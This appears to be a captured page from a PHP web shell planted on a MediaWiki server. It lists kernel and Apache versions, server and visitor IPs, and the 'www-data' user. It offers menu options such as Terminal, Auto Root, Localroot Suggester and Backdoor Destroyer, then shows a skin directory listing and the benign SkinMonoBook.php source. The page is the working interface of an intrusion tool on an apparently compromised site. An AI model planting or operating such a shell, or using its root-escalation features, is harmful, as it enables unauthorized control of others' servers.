Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
skins /
MonoBook /
Delete
Unzip
Name
Size
Permission
Date
Action
i18n
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
skinStyles
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
COPYING
17.67
KB
-rw-r--r--
2016-11-28 20:21
Gruntfile.js
385
B
-rw-r--r--
2016-11-28 20:21
IE60Fixes.css
1.69
KB
-rw-r--r--
2016-11-28 20:21
IE70Fixes.css
1.72
KB
-rw-r--r--
2016-11-28 20:21
MonoBook.php
472
B
-rw-r--r--
2016-11-28 20:21
MonoBookTemplate.php
10.41
KB
-rw-r--r--
2016-11-28 20:21
SkinMonoBook.php
1.61
KB
-rw-r--r--
2016-11-28 20:21
bullet.gif
50
B
-rw-r--r--
2016-11-28 20:21
composer.json
202
B
-rw-r--r--
2016-11-28 20:21
headbg.jpg
7.7
KB
-rw-r--r--
2016-11-28 20:21
hooks.txt
369
B
-rw-r--r--
2016-11-28 20:21
link_icon.gif
342
B
-rw-r--r--
2016-11-28 20:21
magnify-clip.png
134
B
-rw-r--r--
2016-11-28 20:21
main.css
10.76
KB
-rw-r--r--
2016-11-28 20:21
required.gif
47
B
-rw-r--r--
2016-11-28 20:21
skin.json
957
B
-rw-r--r--
2016-11-28 20:21
user.gif
325
B
-rw-r--r--
2016-11-28 20:21
wiki-indexed.png
7.79
KB
-rw-r--r--
2016-11-28 20:21
wiki.png
21.95
KB
-rw-r--r--
2016-11-28 20:21
Save
Rename
<?php /** * MonoBook nouveau. * * Translated from gwicke's previous TAL template version to remove * dependency on PHPTAL. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * http://www.gnu.org/copyleft/gpl.html * * @file * @ingroup Skins */ /** * Inherit main code from SkinTemplate, set the CSS and template filter. * @ingroup Skins */ class SkinMonoBook extends SkinTemplate { /** Using MonoBook. */ public $skinname = 'monobook'; public $stylename = 'MonoBook'; public $template = 'MonoBookTemplate'; /** * @param OutputPage $out */ function setupSkinUserCss( OutputPage $out ) { parent::setupSkinUserCss( $out ); $out->addModuleStyles( array( 'mediawiki.skinning.interface', 'mediawiki.skinning.content.externallinks', 'skins.monobook.styles' ) ); // TODO: Migrate all of these $out->addStyle( $this->stylename . '/IE60Fixes.css', 'screen', 'IE 6' ); $out->addStyle( $this->stylename . '/IE70Fixes.css', 'screen', 'IE 7' ); } }